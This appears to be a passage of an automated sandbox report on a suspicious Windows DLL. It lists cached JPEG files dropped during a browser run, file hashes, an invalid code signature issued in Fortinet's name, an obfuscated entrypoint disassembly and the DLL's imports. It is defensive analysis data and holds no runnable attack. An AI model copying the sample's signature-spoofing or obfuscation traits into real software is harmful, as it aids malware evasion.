                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?../..>f......a..G.G.o.La.!l.....+...5......@...g.Vr.N.K.7(b.V..qj.........@.W...f)).Rb.X.>..A.)Pe...y;.G.A....JLdS..|.R3@.7........@..%.}.....2z...W.T..+.`..8'..x....f.X.......A.bx..:V..I..+...D..B`.#<......EY...Lt..Fj.y.]...:$.....S......a_.(..\.I......!N.H.G'...}.up..8...V.h.?.5"d}..)...))E.....1O`..#..+..^..JoZ/.Z.Z.\.&.&A..S....@.q...M..R.,...iZ.8.RG
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1bkVqR[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 522x368, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9861
                                                                                                                                                                                                  Entropy (8bit):7.616959904752992
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BVMz5EJn3vCPmqdEzfBQrlLuAXlq5wKnyOc:XMz5O3vCNdwyh1qTyOc
                                                                                                                                                                                                  MD5:3EECAA931080853DC400DC856CA50B46
                                                                                                                                                                                                  SHA1:B14F47E48C46AE8489162B0088DDA6D513B5622C
                                                                                                                                                                                                  SHA-256:5FB12CC5ABB93B75CE0DE436BDB8BBB5788CA991A786B5F458EE28B750AFA4AA
                                                                                                                                                                                                  SHA-512:B4E581FD2A7C95EF4FB3E07B97E8D22121D42C845EE6E9A46F9D026EA451683B83E9F138C119B28C19242C47CAD2B1E1380BFAC31D31D9D9FAF2AC40291A29D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...)h......J)i(......Z.....K.4S.=G".....S..f.........QE-.%..P.QKE.%..P.QE..QE..QE..QE..QE..QE..QE-.%.....RQ@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..R..E.P.E..@.K@...{)g......S....N.F..5...=...(.=@?).)\px....A..*G....#...ZP.(..#..*...Jk.....QE..QE..QE..QE..RR.@.E-..........P..IE....P..E..QE..RR.P.E.P.E.P.E.P.E.P.E.P.E.P.E
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1blUVe[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10360
                                                                                                                                                                                                  Entropy (8bit):7.828195946445851
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BYFEQDBOZTxUZ6ITpI6VxzKuq0lJTXlwct/6gR+aRFdH6Gto:eFj0u9pIutDlNXXdH6Eo
                                                                                                                                                                                                  MD5:CC34BF0E4B5A5CBC5EB32FF017C2D324
                                                                                                                                                                                                  SHA1:89984B6795CD7C7E5C5C7658FB1944B977BC6A5C
                                                                                                                                                                                                  SHA-256:D856CDC75B336E30429725D462B224305EF103AA8D38A281826B6F52E9241F25
                                                                                                                                                                                                  SHA-512:AEE22127964018B748E59D92A12DEBFE33771AF2E216FEBD5A60F8C750F909B49812CF20F0204D39696E0B5C5FB2DF4FF9A9E81710E2F6A58734F34DFD58C5AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...))h.W5..g...E...t...A...:........l5.?...S6..V.ax3.E.O.+r...8|(Z)(....)(.h...9....(^......g.q...Z...>....r.>...8...T:.>..QE.%.IE..QE..*.................&y..C....Z.:.........4...(..AE.P.E.P.~.8..>*...7o...7.5.?..|K...l.....".z@..).(...(.........I....*/..xZ.......q.gAE.Vb..|~3......b.*.|{./......[.nK.....?...k....-Z..?.n..~6g....QY..QE..(....9...s5.|4..c..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1bm2WL[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20289
                                                                                                                                                                                                  Entropy (8bit):7.964446732507034
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:edvFgDmT1GG5X0w1xPZegiK6z84BGHXCUk12gtbOQmzufZdw+:eBQmTH5X0w1xPMgibFBBU8HbOvYX
                                                                                                                                                                                                  MD5:9F33CAD1E61FB3FF86BCCA0C173B3B51
                                                                                                                                                                                                  SHA1:8F14AE79FBB0FFE75171A2F488AEB23276A79256
                                                                                                                                                                                                  SHA-256:F5AE1DE18DE6BB07BF6921DF1A344294CB42840FE31CFD30EAC786E2E05BFE9C
                                                                                                                                                                                                  SHA-512:EBCB53F07FF66295B511F89B27BBC93291AB408ADD03405CA2EE6A0F962294831FDD1D0C0BE3927232E40471CFFDBE2A6E2F7D069AFAE168B96FDCD77A53FC91
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...5+.....3\.u.6O.Z../.....}^....8Ss.7S:.".0>...-..!...z.\.k..n.^Z>I2G...9.q..u2......Ey...y..f.?...#.kK...e....Z"...M^..c.tEhu..+.qXg.hY..J..T..1W...qM.6..G.....LgQ.CB.._....>...b..S..d..S......!_Jp.T...5rcDC.V..,...R......p.'..{."..).GzR.**.%RV..=vi.k{|.@..]...L............\....z...._'V..m.,D.b....3ww;....it;.pj....oQSb...c..u8......E3...9C.;9.."[y(}..R.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1bm7jI[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6636
                                                                                                                                                                                                  Entropy (8bit):7.920362502272026
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BCdIc+UMTBCyRE07qWFDrh7uX92/RaOFuVbZ:kdIc+UMhEAqS35a9VF
                                                                                                                                                                                                  MD5:888C73B3784C1D5E2556041827789936
                                                                                                                                                                                                  SHA1:DDBFBB91321EB9591CF600D65C0D8451C0F904FE
                                                                                                                                                                                                  SHA-256:1E3321EB457A16B7B48E2E92326E753E8E799340440080B5CD9F030EA4E0F5DE
                                                                                                                                                                                                  SHA-512:27E400C9FE796691D8A37C145993228141C434876C6285FF54EAE070CF08E02D9C697CE2F5B8F96484C64BE11345095E26E16EA2EEB829A9CC0634F57B024119
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..1E%- .(....Z(...(.h.........`z....Ep5.x.....?..rc...F.~#..c...f...b.......i.....q.M.K@.".......J.^.7z.s.Ob.."..j..s.DjbmU.!..SIV`.(....(...(..R.I....{Y..P..v.1.] b2.h....p....I.6...S.K...F.s.G:4.fSB......hSC.wQ#...F+...r.8.=. .G-.T..<.ua.a.p..._.d....G..V..4.9...'.1...CcH6...1..28.....I*n.FO......,...t..f.....=.M-.t...:...Q..j........s...$.*9..)4..*n.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1bm99T[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15396
                                                                                                                                                                                                  Entropy (8bit):7.9420734020928
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eRDq2GB6vtgjMWmqcXIe0temR9yt6TA587s4hYaWa+zi:eRD11vtgJ4Z0a8TA58otnaX
                                                                                                                                                                                                  MD5:1A7F0612E58C201BDEAE70E40998FCFD
                                                                                                                                                                                                  SHA1:F311B13027B00B8A4CB96CD6D39DBFD4992975FB
                                                                                                                                                                                                  SHA-256:21461E0A2140FBC2160C6D36AE1A17A945A35C99343B6A59A41BAA2A360025EB
                                                                                                                                                                                                  SHA-512:7DAF261B3EAAA28E2C54454A5BF8C814A5FDED8D33DB0F9B2F4673C497E81A819AF3620B2E8000BBB9D745B5CE462AEAB4DBD1C43747F66561B1D4DCB256D3A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...W:D....5.3XBT.J....9...8....+..n..(Q.B....._U..P.|.%......0YN..k.Z..Y..0....ky.....h.....eV.l.....O6.ol..#..5SK.6..:...........0.Ec.4...k.I..$.X...5..+..m.R.......R#9...xVfi$.8.h^F..e"\.+..r....V.^.../.P.rh.>KI.|...w.*?o.]<WV...H..CC..K.Qy...l...4...s..FC....9t...S....I.R.H.t...s..2&..I.......{.dym............4..p.LF*3(.q.[...*...8.....$.....Lx.@.e8.....
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1bmbQn[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9654
                                                                                                                                                                                                  Entropy (8bit):7.947049421713856
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BCKdZKQ7aNzyMGcRNXRPIitAE8fVBGNx/tJEfSMjiixRGzaxykY4:kqzckcRTtAxfYtM52Gxykp
                                                                                                                                                                                                  MD5:E134D6B2A6ACA617C26FB56D71064FC0
                                                                                                                                                                                                  SHA1:0CFE738CD5B8EF593028884E5A3738630D6FFB07
                                                                                                                                                                                                  SHA-256:660BC3DA7E14AC404983DF1D237700D6DF5899B2D62FA5CFA8391FC3268C9F46
                                                                                                                                                                                                  SHA-512:AC290835FAAEF4F4F03DFB42A5439D429919719A77710611AA30948AAB0960BE49AA9C57DD8C5F088D675BA193EE380FE727AD32BF08B8E79557D06D2F236877
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....!NjP=.+.^}....i.j\ai0(.....P*S.N28....v).~."c....A..5..".R7<T42.).*gJ...g!....-.7.2...........R@A.YxG~1..g....P.*..e#.F+..8..%C$.I...t......p.eL...J...L..%...1..$......b...=.G.j.P...?_.;v...8..\.>...%_.....nW.i.Pe..Z...#...,gr.3...j.20.,...PJ.*A.j...-..b..F`.>Q.@.@..)../".#4,..#|.?.o.c.Sz.Qh..3I.b.......w(....L...;.D...*.....+..^....$.G.hm....H...2...J..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1bmbzB[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10542
                                                                                                                                                                                                  Entropy (8bit):7.927347998362772
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BYBNAGGGSpznV47wPAf/6gVKJPy2LVkpxLR7MWJFR+1ij2tgFLvEuof:ezAGEpW9VK5FgxLNMWdXj2tqDEuof
                                                                                                                                                                                                  MD5:82FE7F6F24ED2CC067D379127477D637
                                                                                                                                                                                                  SHA1:301D05CC2E1E158E97BC45D702827F924DB19F92
                                                                                                                                                                                                  SHA-256:BC9C061E1C369C6D47DA57B12BD692013539BF6C316290926613638DC35CBB00
                                                                                                                                                                                                  SHA-512:DEEE9536FB8E1DA1ED485C54A6386E268C2946F74DF8F31DC3A5E00EBE95502CF34C5FDCD97C068E17821C4344CCC2EF1C2523F8DA506D44929B150403CB5C00
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Q.~(.v..f(.I.1E..x..&(..r<R.1N.q....Q.,...1O....q....Q.,...1O....q....Q.,;.....Q`..Q.~(........Q`..Q.~(........Q`..Q.~)1E..qI.~(.E..(..m......1J..).....E.(.`.-.QE..(.p.(...1E..\...(..E.Qp.(...Q.(...b.)...b.(.....W.....w......<.....5.i...T!4....t"...b..v)@..7\Paa....dP]O..v>Tg...M.ZD+zS..n.J.q8v(b.T.@T.P.GZ..!.....QL.7.b.E.q......R.\TX....b..J)qF(.....b..QK.1E.J

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                                  Entropy (8bit):6.594484056954573
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                  File name:vnaSKDMnLG.dll
                                                                                                                                                                                                  File size:240032
                                                                                                                                                                                                  MD5:c9d954b3f1c512e6804fd8f5637b58b6
                                                                                                                                                                                                  SHA1:b452040d8072117ddbe1adf9e1eab5e4bdb150bd
                                                                                                                                                                                                  SHA256:d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3
                                                                                                                                                                                                  SHA512:a4e949017016c1cfaa9bdff664c8ee20b2a34fe78788de9a4338ae5ad9a8a2623ccafe6d4584ef4f6cb29bc05dbcb3a71cbcd4051560287fbe74fb5a5738c09b
                                                                                                                                                                                                  SSDEEP:6144:SCY2oo127AHBPr4CggrMbPMdsf5LLNBU94nzKE:SSD6w4bKsf5PUomE
                                                                                                                                                                                                  File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!................a.............@..........................P......x-..............................._..W..

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Entrypoint:0x40c161
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                  Import Hash:ace13c17e53d07ea38e285dca185c74f

                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                  Signature Issuer:CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                  • 7/29/2015 5:00:00 PM 7/29/2018 4:59:59 PM
                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                  • CN=Fortinet Technologies (Canada) Inc., O=Fortinet Technologies (Canada) Inc., L=Burnaby, S=British Columbia, C=CA
                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                  Thumbprint MD5:CED7C13C8B94994AFFCC6AD7B7DF388F
                                                                                                                                                                                                  Thumbprint SHA-1:B27F938A1E7F314A7B60C48EA196961CDAA09F7A
                                                                                                                                                                                                  Thumbprint SHA-256:3C658DDCD37DFA65F69C0B35697EDAA12DBDF68388A9AD54BBEFCF24F786ABB7
                                                                                                                                                                                                  Serial:5755C3BFA958E29EF9DCA3FBA9FC02D4

                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  sub esp, 24h
                                                                                                                                                                                                  push esi
                                                                                                                                                                                                  call dword ptr [0042E620h]
                                                                                                                                                                                                  mov dword ptr [ebp-20h], eax
                                                                                                                                                                                                  lea ecx, dword ptr [00436978h]
                                                                                                                                                                                                  add ecx, 7Ah
                                                                                                                                                                                                  xor ecx, dword ptr [004368F8h]
                                                                                                                                                                                                  mov dword ptr [ebp-0Ch], ecx
                                                                                                                                                                                                  mov ecx, C12769C1h
                                                                                                                                                                                                  mov dword ptr [ebp-0Ch], ecx
                                                                                                                                                                                                  mov dword ptr [004369D0h], 00000020h
                                                                                                                                                                                                  lea esi, dword ptr [00436980h]
                                                                                                                                                                                                  add esi, 22h
                                                                                                                                                                                                  sub esi, dword ptr [004368F8h]
                                                                                                                                                                                                  add esi, 49h
                                                                                                                                                                                                  mov dword ptr [0043699Ch], esi
                                                                                                                                                                                                  sub dword ptr [004369D0h], 00000001h
                                                                                                                                                                                                  cmp dword ptr [004369D0h], 00000000h
                                                                                                                                                                                                  jne 00007FC624AC6514h
                                                                                                                                                                                                  mov edi, 20469F11h
                                                                                                                                                                                                  mov dword ptr [ebp-10h], edi
                                                                                                                                                                                                  push 004364A0h
                                                                                                                                                                                                  call dword ptr [0042F088h]
                                                                                                                                                                                                  mov dword ptr [ebp-14h], eax
                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                  mov eax, 0000000Ch
                                                                                                                                                                                                  xor eax, dword ptr [00436978h]
                                                                                                                                                                                                  sub eax, FFFFFFBBh
                                                                                                                                                                                                  xor eax, dword ptr [00436980h]
                                                                                                                                                                                                  mov dword ptr [0043699Ch], eax
                                                                                                                                                                                                  mov eax, A89368FFh
                                                                                                                                                                                                  mov dword ptr [00436978h], eax
                                                                                                                                                                                                  mov dword ptr [004369D0h], 0000002Ch
                                                                                                                                                                                                  lea ecx, dword ptr [004368F8h]
                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], ecx
                                                                                                                                                                                                  sub dword ptr [004369D0h], 00000001h
                                                                                                                                                                                                  cmp dword ptr [004369D0h], 00000000h

                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x15fb00x1457.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2f5dc0x3d4.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x38c000x1da0.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x420000x21a0.reloc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x12840x134.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2dd440x1610.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                  Sections

                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .text0x10000x16ed70x17000False0.575534986413data6.34490756797IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rdata0x180000x297f00x1ea00False0.581066645408data6.05682364771IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .reloc0x420000x21a00x2200False0.806295955882data6.7989335013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                  Imports

                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  advapi32.dllCryptDeriveKey, CryptImportKey, AllocateAndInitializeSid, CryptGetHashParam, SetSecurityDescriptorOwner, IsValidSid, GetSecurityDescriptorOwner, RegDeleteKeyW, ConvertSecurityDescriptorToStringSecurityDescriptorW, DestroyPrivateObjectSecurity, RegLoadKeyW, CryptExportKey, CryptDecrypt, GetSidLengthRequired, CopySid, ChangeServiceConfigW, GetSecurityDescriptorGroup, BuildExplicitAccessWithNameW, DuplicateTokenEx, EqualSid, CryptGenRandom, IsTextUnicode, GetSecurityDescriptorControl, DeregisterEventSource, QueryTraceW, QueryServiceConfig2W, StopTraceW, RegEnumKeyExA, CryptHashSessionKey, StartServiceW, CryptSetKeyParam, RegOpenKeyExW, RegisterEventSourceW, LsaQueryInformationPolicy, CheckTokenMembership, GetUserNameW, GetSecurityDescriptorLength, ImpersonateLoggedOnUser, RegCreateKeyExA, RegCloseKey, CreatePrivateObjectSecurityEx, InitializeSid, RegNotifyChangeKeyValue, ConvertStringSecurityDescriptorToSecurityDescriptorW, CryptReleaseContext, GetSecurityDescriptorDacl, ReportEventA, CreateWellKnownSid, CreateProcessAsUserW, LsaClose, CryptGetProvParam, GetTokenInformation, GetSecurityDescriptorSacl, RegQueryValueW, LookupPrivilegeDisplayNameW, ConvertStringSecurityDescriptorToSecurityDescriptorA, SetSecurityInfo, CryptDestroyKey, ChangeServiceConfig2W, OpenServiceW, RegFlushKey, CryptDestroyHash, GetSidIdentifierAuthority, SetNamedSecurityInfoW, OpenThreadToken, ConvertSidToStringSidW, RegQueryValueExA, InitializeSecurityDescriptor, CryptEncrypt, GetNamedSecurityInfoW, OpenProcessToken, SetSecurityDescriptorSacl, GetLengthSid, SetSecurityDescriptorDacl, GetTraceLoggerHandle, CryptDuplicateHash, CryptSetProvParam, StartServiceCtrlDispatcherW, ReportEventW, AdjustTokenPrivileges, CryptDuplicateKey, MapGenericMask, CreateServiceW, GetTraceEnableFlags, CryptCreateHash, RegConnectRegistryW, EnableTrace, AddAccessAllowedAce, RegisterServiceCtrlHandlerW, LookupPrivilegeValueW, RegCreateKeyExW, AddAce, QueryServiceStatusEx, InitializeAcl, LookupAccountNameW, CryptGetKeyParam, SetFileSecurityW, TraceEvent, RegSetValueExW, RegOpenKeyA, RegQueryInfoKeyW, RegDeleteValueA, RegOpenKeyW, RegDeleteKeyA, LsaOpenPolicy, GetAclInformation, RegCreateKeyA, StartTraceW, UnregisterTraceGuids, OpenSCManagerW, RegDeleteValueW, RegSetKeySecurity, LsaFreeMemory, GetSidSubAuthorityCount, DeleteService, RegUnLoadKeyW, ControlService, CryptVerifySignatureW, FreeSid, TraceMessage, RegSetValueW, SetServiceStatus, GetSidSubAuthority, RegEnumKeyW, CryptAcquireContextW, QueryServiceConfigW, IsWellKnownSid, CryptSetHashParam, IsValidSecurityDescriptor, RegisterTraceGuidsW, FlushTraceW, RegQueryValueExW, MakeSelfRelativeSD, GetAce, RegCreateKeyW, RegOpenKeyExA, RevertToSelf, CryptHashData, SetThreadToken, RegEnumKeyExW, RegEnumValueW, GetSecurityInfo, QueryServiceStatus, LookupAccountSidW, SetEntriesInAclW, GetTraceEnableLevel, CloseServiceHandle, CryptGenKey, GetFileSecurityW, RegQueryInfoKeyA, RegEnumKeyA, RegSetValueExA
                                                                                                                                                                                                  certmgr.dllDllUnregisterServer
                                                                                                                                                                                                  cfgmgr32.dllCM_Get_DevNode_Status
                                                                                                                                                                                                  clusapi.dllGetNodeClusterState
                                                                                                                                                                                                  comctl32.dllCreatePropertySheetPageW
                                                                                                                                                                                                  comdlg32.dllGetFileTitleA, GetFileTitleW
